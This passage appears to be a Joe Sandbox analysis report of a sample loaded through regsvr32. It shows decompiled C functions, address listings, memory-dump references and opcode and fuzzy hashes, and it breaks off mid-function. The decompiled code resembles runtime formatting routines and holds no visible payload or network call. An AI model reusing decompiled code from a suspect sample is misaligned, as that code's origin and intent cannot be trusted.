                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5206c1c74246183c2e21ae1b827f57419da488a84ccfce003a3f457c1425261b
                                                                      • Instruction ID: 6d70d95d04803e6da3c36b22bcfaaa563c6f89621c54eb4c0b6ee973f37cf2ad
                                                                      • Opcode Fuzzy Hash: 5206c1c74246183c2e21ae1b827f57419da488a84ccfce003a3f457c1425261b
                                                                      • Instruction Fuzzy Hash: 9F519077604E5C82E7AA8F28C1543AC37A1E359BA8F158216EE49177E8DF21DE45C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001DE4C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001df33;
                                                                      				if (_t111 == 0) goto 0x8001de9c;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001df87;
                                                                      				if (_t112 == 0) goto 0x8001df0b;
                                                                      				if (_t112 == 0) goto 0x8001dee4;
                                                                      				if (_t112 == 0) goto 0x8001df87;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001df53;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001dece;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001dece;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001dfb2;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001dfc9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001df05;
                                                                      				goto 0x8001deb7;
                                                                      				goto 0x8001deb7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001df2d;
                                                                      				goto 0x8001deb7;
                                                                      				goto 0x8001deb7;
                                                                      				if (_t119 == 0) goto 0x8001de9c;
                                                                      				if (_t119 == 0) goto 0x8001de9c;
                                                                      				if (_t119 == 0) goto 0x8001de9c;
                                                                      				goto 0x8001de8a;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001e022;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001dfaa;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001deb7;
                                                                      				goto 0x8001deb7;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001dfd2;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001dfec;
                                                                      				E000000011800269D0(0, _t134, _t150);
                                                                      				goto 0x8001dff3;
                                                                      				E00000001180026A74( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001e020;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001e011;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001e020;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001de4c
                                                                      0x18001de51
                                                                      0x18001de56
                                                                      0x18001de60
                                                                      0x18001de63
                                                                      0x18001de66
                                                                      0x18001de69
                                                                      0x18001de6c
                                                                      0x18001de72
                                                                      0x18001de74
                                                                      0x18001de76
                                                                      0x18001de7f
                                                                      0x18001de88
                                                                      0x18001de8d
                                                                      0x18001de96
                                                                      0x18001de9c
                                                                      0x18001dea4
                                                                      0x18001debe
                                                                      0x18001dec3
                                                                      0x18001decb
                                                                      0x18001ded2
                                                                      0x18001ded8
                                                                      0x18001dedf
                                                                      0x18001deec
                                                                      0x18001defc
                                                                      0x18001df03
                                                                      0x18001df09
                                                                      0x18001df13
                                                                      0x18001df1d
                                                                      0x18001df24
                                                                      0x18001df2b
                                                                      0x18001df31
                                                                      0x18001df36
                                                                      0x18001df3f
                                                                      0x18001df48
                                                                      0x18001df4e
                                                                      0x18001df53
                                                                      0x18001df57
                                                                      0x18001df5a
                                                                      0x18001df61
                                                                      0x18001df65
                                                                      0x18001df70
                                                                      0x18001df75
                                                                      0x18001df7b
                                                                      0x18001df82
                                                                      0x18001df8f
                                                                      0x18001df9f
                                                                      0x18001dfa1
                                                                      0x18001dfa5
                                                                      0x18001dfad
                                                                      0x18001dfbd
                                                                      0x18001dfc4
                                                                      0x18001dfcc
                                                                      0x18001dfce
                                                                      0x18001dfd2
                                                                      0x18001dfd6
                                                                      0x18001dfe0
                                                                      0x18001dfe5
                                                                      0x18001dfea
                                                                      0x18001dfee
                                                                      0x18001dffb
                                                                      0x18001e006
                                                                      0x18001e00f
                                                                      0x18001e011
                                                                      0x18001e01a
                                                                      0x18001e01d
                                                                      0x18001e036

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 151bab0a8e5aa45915f3a009bd21e75f9c20f90f976b4d2f2aed96c9ab8acf81
                                                                      • Instruction ID: 20a7768c79bc3d1e109dad942e4ce3b1710cc05c0df87d055cb56ca085208fba
                                                                      • Opcode Fuzzy Hash: 151bab0a8e5aa45915f3a009bd21e75f9c20f90f976b4d2f2aed96c9ab8acf81
                                                                      • Instruction Fuzzy Hash: 6F51C977610A5C82E7AA9F28C0543AC27B0E359B99F15811AFF461B7D9CF31DE46C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001E424(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001e50b;
                                                                      				if (_t110 == 0) goto 0x8001e474;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001e55f;
                                                                      				if (_t111 == 0) goto 0x8001e4e3;
                                                                      				if (_t111 == 0) goto 0x8001e4bc;
                                                                      				if (_t111 == 0) goto 0x8001e55f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001e52b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e4a6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e4a6;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e58a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e5a1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e4dd;
                                                                      				goto 0x8001e48f;
                                                                      				goto 0x8001e48f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001e505;
                                                                      				goto 0x8001e48f;
                                                                      				goto 0x8001e48f;
                                                                      				if (_t118 == 0) goto 0x8001e474;
                                                                      				if (_t118 == 0) goto 0x8001e474;
                                                                      				if (_t118 == 0) goto 0x8001e474;
                                                                      				goto 0x8001e462;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001e5f4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e582;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001e48f;
                                                                      				goto 0x8001e48f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001e5aa;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001e5c4;
                                                                      				E00000001180026DAC(_t133, _t149);
                                                                      				goto 0x8001e5cb;
                                                                      				E00000001180026E38( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001e5f2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001e5e4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001e5f2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001e424
                                                                      0x18001e429
                                                                      0x18001e42e
                                                                      0x18001e438
                                                                      0x18001e43b
                                                                      0x18001e43e
                                                                      0x18001e441
                                                                      0x18001e444
                                                                      0x18001e44a
                                                                      0x18001e44c
                                                                      0x18001e44e
                                                                      0x18001e457
                                                                      0x18001e460
                                                                      0x18001e465
                                                                      0x18001e46e
                                                                      0x18001e474
                                                                      0x18001e47c
                                                                      0x18001e496
                                                                      0x18001e49b
                                                                      0x18001e4a3
                                                                      0x18001e4aa
                                                                      0x18001e4b0
                                                                      0x18001e4b7
                                                                      0x18001e4c4
                                                                      0x18001e4d4
                                                                      0x18001e4db
                                                                      0x18001e4e1
                                                                      0x18001e4eb
                                                                      0x18001e4f5
                                                                      0x18001e4fc
                                                                      0x18001e503
                                                                      0x18001e509
                                                                      0x18001e50e
                                                                      0x18001e517
                                                                      0x18001e520
                                                                      0x18001e526
                                                                      0x18001e52b
                                                                      0x18001e52f
                                                                      0x18001e532
                                                                      0x18001e539
                                                                      0x18001e53d
                                                                      0x18001e548
                                                                      0x18001e54d
                                                                      0x18001e553
                                                                      0x18001e55a
                                                                      0x18001e567
                                                                      0x18001e577
                                                                      0x18001e579
                                                                      0x18001e57d
                                                                      0x18001e585
                                                                      0x18001e595
                                                                      0x18001e59c
                                                                      0x18001e5a4
                                                                      0x18001e5a6
                                                                      0x18001e5aa
                                                                      0x18001e5ae
                                                                      0x18001e5b8
                                                                      0x18001e5bd
                                                                      0x18001e5c2
                                                                      0x18001e5c6
                                                                      0x18001e5d3
                                                                      0x18001e5d9
                                                                      0x18001e5e2
                                                                      0x18001e5e4
                                                                      0x18001e5ec
                                                                      0x18001e5ef
                                                                      0x18001e608

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5e203e6392e15b4c46ee31a7082fbad2360cd785d2f759fd249f02270d81ae3
                                                                      • Instruction ID: f855209a0ece2b1f13537581bfa27ee1b87e995312abc92cf701f05965182070
                                                                      • Opcode Fuzzy Hash: c5e203e6392e15b4c46ee31a7082fbad2360cd785d2f759fd249f02270d81ae3
                                                                      • Instruction Fuzzy Hash: 0651BE73600E9883E7AA8F28C1543BC37A1E35AB9CF158116EF4617799DF20CE89C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001E60C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001e6f3;
                                                                      				if (_t110 == 0) goto 0x8001e65c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001e747;
                                                                      				if (_t111 == 0) goto 0x8001e6cb;
                                                                      				if (_t111 == 0) goto 0x8001e6a4;
                                                                      				if (_t111 == 0) goto 0x8001e747;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001e713;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e68e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e68e;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e772;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e789;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e6c5;
                                                                      				goto 0x8001e677;
                                                                      				goto 0x8001e677;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001e6ed;
                                                                      				goto 0x8001e677;
                                                                      				goto 0x8001e677;
                                                                      				if (_t118 == 0) goto 0x8001e65c;
                                                                      				if (_t118 == 0) goto 0x8001e65c;
                                                                      				if (_t118 == 0) goto 0x8001e65c;
                                                                      				goto 0x8001e64a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001e7dc;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e76a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001e677;
                                                                      				goto 0x8001e677;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0x91
                                                                      				E0000000118001A174(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001e792;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001e7ac;
                                                                      				E00000001180026EC4(0, _t133, _t149);
                                                                      				goto 0x8001e7b3;
                                                                      				E00000001180026F40( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001e7da;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001e7cc;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001e7da;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001e60c
                                                                      0x18001e611
                                                                      0x18001e616
                                                                      0x18001e620
                                                                      0x18001e623
                                                                      0x18001e626
                                                                      0x18001e629
                                                                      0x18001e62c
                                                                      0x18001e632
                                                                      0x18001e634
                                                                      0x18001e636
                                                                      0x18001e63f
                                                                      0x18001e648
                                                                      0x18001e64d
                                                                      0x18001e656
                                                                      0x18001e65c
                                                                      0x18001e664
                                                                      0x18001e67e
                                                                      0x18001e683
                                                                      0x18001e68b
                                                                      0x18001e692
                                                                      0x18001e698
                                                                      0x18001e69f
                                                                      0x18001e6ac
                                                                      0x18001e6bc
                                                                      0x18001e6c3
                                                                      0x18001e6c9
                                                                      0x18001e6d3
                                                                      0x18001e6dd
                                                                      0x18001e6e4
                                                                      0x18001e6eb
                                                                      0x18001e6f1
                                                                      0x18001e6f6
                                                                      0x18001e6ff
                                                                      0x18001e708
                                                                      0x18001e70e
                                                                      0x18001e713
                                                                      0x18001e717
                                                                      0x18001e71a
                                                                      0x18001e721
                                                                      0x18001e725
                                                                      0x18001e730
                                                                      0x18001e735
                                                                      0x18001e73b
                                                                      0x18001e742
                                                                      0x18001e74f
                                                                      0x18001e75f
                                                                      0x18001e761
                                                                      0x18001e765
                                                                      0x18001e76d
                                                                      0x18001e77d
                                                                      0x18001e780
                                                                      0x18001e784
                                                                      0x18001e78c
                                                                      0x18001e78e
                                                                      0x18001e792
                                                                      0x18001e796
                                                                      0x18001e7a0
                                                                      0x18001e7a5
                                                                      0x18001e7aa
                                                                      0x18001e7ae
                                                                      0x18001e7bb
                                                                      0x18001e7c1
                                                                      0x18001e7ca
                                                                      0x18001e7cc
                                                                      0x18001e7d4
                                                                      0x18001e7d7
                                                                      0x18001e7f0

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 18a7ac4220370f950105c2ff99efd8eddcc574a7ab7da053c7628f62846187ff
                                                                      • Instruction ID: 92e331482afeec53dd22de0f3aff4c5bcbff3149445c5159aee40323bdc719c1
                                                                      • Opcode Fuzzy Hash: 18a7ac4220370f950105c2ff99efd8eddcc574a7ab7da053c7628f62846187ff
                                                                      • Instruction Fuzzy Hash: AE51EE77604A9882F7AE8F28C1543AC37A0E76ABD8F158116EF45177D8CF25DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001E7F4(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001e8db;
                                                                      				if (_t110 == 0) goto 0x8001e844;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001e92f;
                                                                      				if (_t111 == 0) goto 0x8001e8b3;
                                                                      				if (_t111 == 0) goto 0x8001e88c;
                                                                      				if (_t111 == 0) goto 0x8001e92f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001e8fb;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e876;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e876;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e95a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e971;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e8ad;
                                                                      				goto 0x8001e85f;
                                                                      				goto 0x8001e85f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001e8d5;
                                                                      				goto 0x8001e85f;
                                                                      				goto 0x8001e85f;
                                                                      				if (_t118 == 0) goto 0x8001e844;
                                                                      				if (_t118 == 0) goto 0x8001e844;
                                                                      				if (_t118 == 0) goto 0x8001e844;
                                                                      				goto 0x8001e832;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001e9c4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e952;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001e85f;
                                                                      				goto 0x8001e85f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
